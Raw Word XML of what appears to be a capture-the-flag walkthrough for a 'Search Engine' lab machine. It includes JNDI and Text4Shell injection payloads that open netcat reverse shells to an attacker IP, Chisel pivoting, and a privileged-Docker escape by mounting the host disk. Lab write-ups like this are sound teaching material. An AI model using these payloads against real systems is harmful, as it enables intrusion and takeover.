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md5x29xlq8d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gjyyfwyiu02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tqlvonadmwsb" w:id="2"/>
      <w:bookmarkEnd w:id="2"/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SEARCH ENGINE machine.If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i0e0pjrao5qx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Nmap Scan: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first step, we need to determine which services are running in the background and which ports are open. Therefore, we will use a tool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nmap -p- &lt;ip-machine&gt; -Pn --min-rate 500</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr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76400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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(web service)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111 (rpcbind)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 as active on the host.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web service on port 80, the returned content consists only of a static template simulating a bank account page. Considering the absence of visible dynamic functionality, a more appropriate approach is to perform a fuzzing process to identify possible directories or relevant routes that may be present on the server but are not explicitly exposed in the initial interface.</w:t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performing fuzzing, we identified the existence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/search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route. When accessing this route, it is necessary to provide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parameter for the functionality to be triggered.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6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some testing, we identified that the application was developed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Spring Boot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framework and is running on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 Tomcat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server. This conclusion was based on the error message returned in HTTP 400 status responses.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6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taym0izrjz3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JNDI Injection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testing, it was identified that the application is vulnerable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JNDI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 vulnerability was exploited by sending the following payload in the application's input parameter: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${jndi:ldap://&lt;ip-vpn&gt;:1389}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188038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URL-encode the payload.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payload submission, the application attempted to resolve the JNDI reference, resulting in a connection being established with our Netcat listener on the specified IP and por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&lt;ip-vpn&gt;:1389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behavior confirms that the application processes inputs insecurely, allowing the exploitation of a JNDI injection vulnerability.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11300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Knowing about the vulnerability, we can exploit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Code Execution (RCE)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JNDI-Exploit-Kit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For more details about configuration and usage, refer to the official GitHub repository.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https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar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downloading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JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar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our machine, we can start exploitation by executing the following command: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java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc &lt;ip-vpn&gt; 4444 -e sh" -A &lt;ip-vpn&gt;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command configures the exploit to execute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establishing a connection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&lt;ip-vpn&gt;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4444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redirecting input and output to the vulnerable machine’s shell.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Netcat listener to receive the connection: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0" l="0" r="0" t="0"/>
            <wp:docPr id="6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${jndi:ldap://&lt;ip-vpn&gt;:1389/&lt;string&gt;}   Obs: URLENCODE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sending the payload above, we received the shell.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accessing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/app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directory, we can obtain the first flag.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25700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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we are in a Docker environment, we can perform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ping sweep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discover new hosts within the Docker network. For this, we need to send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static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version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the target machine, which can be obtained from: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hyperlink r:id="rId20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https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap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0" l="0" r="0" t="0"/>
            <wp:docPr id="5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47800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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discovering the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172.18.0.3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ping sweep, the next step is to perform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scan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identify open ports on the target.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08100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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port scanning, we identified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is associated with a web service.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Now, to access this service in our local browser, we need to use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pivoting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technique. For this, we will use the tool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Chisel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</w:t>
      </w:r>
      <w:hyperlink r:id="rId2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https://github.com/jpillora/chisel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5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machine:</w:t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./chisel server -p 9000 --reverse</w:t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Target machine:</w:t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./chisel client &lt;ip-vpn&gt;:9000 R:8082:172.18.0.3:8080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0" l="0" r="0" t="0"/>
            <wp:docPr id="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6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completing the steps above, we can access the application on our local machine.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application, we did not find relevant information, only an error page. The next step is to perform fuzzing to identify possible relevant directories or routes. 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fuzzing, we identified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/query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route.</w:t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interact with this route, it is necessary to pass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"search"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parameter.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5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some research, we identified that the application is vulnerable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Text4Shell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For more details, access the link below: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hyperlink r:id="rId32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https://www.logpoint.com/en/blog/text4shell-detecting-exploitation-of-cve-2022-42889/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Payload:</w:t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${script:javascript:java.lang.Runtime.getRuntime().exec('nc &lt;ip-vpn&gt; 4444 -e sh')}</w:t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188038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URL-encode the payload.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Netcat listener to receive the connection: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4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sending the payload, we received the shell.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44600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accessing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and reading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.bash_history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file, we observed that the root user mounted the main host filesystem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/mnt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directory. However, when accessing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/mnt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did not find anything mounted.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this information, we can conclude that this container is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privileged container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Therefore, we can follow the steps below to escape the container and obtain the final flag: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3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https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-privileged.html#m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df -h</w:t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mount /dev/nvme0n1p1 /mnt</w:t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cd /mnt/root</w:t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62200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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37" w:type="default"/>
      <w:headerReference r:id="rId38" w:type="first"/>
      <w:headerReference r:id="rId39" w:type="even"/>
      <w:footerReference r:id="rId40" w:type="default"/>
      <w:footerReference r:id="rId41" w:type="first"/>
      <w:footerReference r:id="rId42" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0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All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o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8" name="image17.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image17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jc w:val="center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Search Engine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hyperlink" Target="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External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0.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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2.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.logpoint.com/en/blog/text4shell-detecting-exploitation-of-cve-2022-42889/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-privileged.html#m" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21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IDxIYcokywe7HUFS5iteIE2KQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLjZnanl5Znd5aXUwMjIOaC50cWx2b25hZG13c2IyDmguaTBlMHBqcmFvNXF4Mg5oLnF0YXltMGl6cmp6MzIOaC4xNzVmNWNzOTR6MG84AHIhMVhrVWlmVi1NdzdTV1czcmZsNGkzYWpfQXJmc29PN1No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